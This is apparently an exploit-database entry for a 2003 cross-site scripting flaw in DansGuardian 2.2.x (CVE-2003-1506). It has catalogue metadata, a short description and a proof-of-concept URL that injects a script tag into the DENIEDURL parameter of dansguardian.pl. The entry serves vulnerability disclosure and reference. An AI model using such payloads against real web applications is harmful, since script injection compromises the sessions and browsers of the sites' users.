DansGuardian 2.2.x - Denied URL Cross-Site Scripting
Author: Richard Maudsley
type: webapps
platform: cgi
port:
date_added: 2003-10-22
date_updated: 2012-12-09
verified: 1
codes: CVE-2003-1506;OSVDB-2748
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/8876/info
A problem has been reported in the handling of some types of input to DansGuardian. This problem may permit an attacker to launch cross-site scripting attacks.
http://www.example.com/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Test');window.open+("http://www.example.com")</script>